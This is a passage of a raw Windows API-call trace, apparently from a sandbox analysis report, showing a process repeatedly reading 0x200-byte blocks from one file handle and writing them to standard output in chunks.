[0136.872] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.872] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.872] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.872] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.872] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] GetFileType (hFile=0x50) returned 0x1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] GetFileType (hFile=0x50) returned 0x1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] GetFileType (hFile=0x50) returned 0x1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] GetFileType (hFile=0x50) returned 0x1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 
[0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] GetFileType (hFile=0x50) returned 0x1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] GetFileType (hFile=0x50) returned 0x1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] GetFileType (hFile=0x50) returned 0x1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] GetFileType (hFile=0x50) returned 0x1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.873] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.873] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.873] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.873] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, 
lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] GetFileType (hFile=0x50) returned 0x1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] GetFileType (hFile=0x50) returned 0x1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] GetFileType (hFile=0x50) returned 0x1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] GetFileType (hFile=0x50) returned 0x1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] GetFileType (hFile=0x50) returned 0x1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] GetFileType (hFile=0x50) returned 0x1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] GetFileType (hFile=0x50) returned 0x1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] GetFileType (hFile=0x50) returned 0x1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.874] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.874] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.874] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.874] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] GetFileType (hFile=0x50) returned 0x1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] GetFileType (hFile=0x50) returned 0x1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] GetFileType 
(hFile=0x50) returned 0x1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] GetFileType (hFile=0x50) returned 0x1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] GetFileType (hFile=0x50) returned 0x1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] GetFileType (hFile=0x50) returned 0x1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] GetFileType (hFile=0x50) returned 0x1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] GetFileType (hFile=0x50) returned 0x1 [0136.875] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.875] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.875] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.875] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.875] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] GetFileType (hFile=0x50) returned 0x1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] GetFileType (hFile=0x50) returned 0x1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] GetFileType (hFile=0x50) returned 0x1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] GetFileType (hFile=0x50) returned 0x1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, 
lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] GetFileType (hFile=0x50) returned 0x1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] GetFileType (hFile=0x50) returned 0x1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.876] GetFileType (hFile=0x50) returned 0x1 [0136.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.876] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.876] GetFileType (hFile=0x50) returned 0x1 [0136.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.876] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.876] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.876] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.876] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.876] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.876] GetFileType (hFile=0x50) returned 0x1 [0136.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.876] GetFileType (hFile=0x50) returned 0x1 [0136.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.876] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.876] GetFileType (hFile=0x50) returned 0x1 [0136.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.876] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.876] GetFileType (hFile=0x50) returned 0x1 [0136.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.876] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] GetFileType (hFile=0x50) returned 0x1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] GetFileType (hFile=0x50) returned 0x1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] WriteFile (in: 
hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] GetFileType (hFile=0x50) returned 0x1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] GetFileType (hFile=0x50) returned 0x1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.877] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.877] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.877] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.877] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] GetFileType (hFile=0x50) returned 0x1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] GetFileType (hFile=0x50) returned 0x1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.877] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0136.877] GetFileType (hFile=0x50) returned 0x1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] GetFileType (hFile=0x50) returned 0x1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] GetFileType (hFile=0x50) returned 0x1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] GetFileType (hFile=0x50) returned 0x1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] GetFileType (hFile=0x50) returned 0x1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 
[0136.878] GetFileType (hFile=0x50) returned 0x1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.878] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.878] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.878] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.878] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] GetFileType (hFile=0x50) returned 0x1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] GetFileType (hFile=0x50) returned 0x1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] GetFileType (hFile=0x50) returned 0x1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] GetFileType (hFile=0x50) returned 0x1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, 
lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] GetFileType (hFile=0x50) returned 0x1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] GetFileType (hFile=0x50) returned 0x1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] GetFileType (hFile=0x50) returned 0x1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] GetFileType (hFile=0x50) returned 0x1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.879] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.879] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.879] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.879] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, 
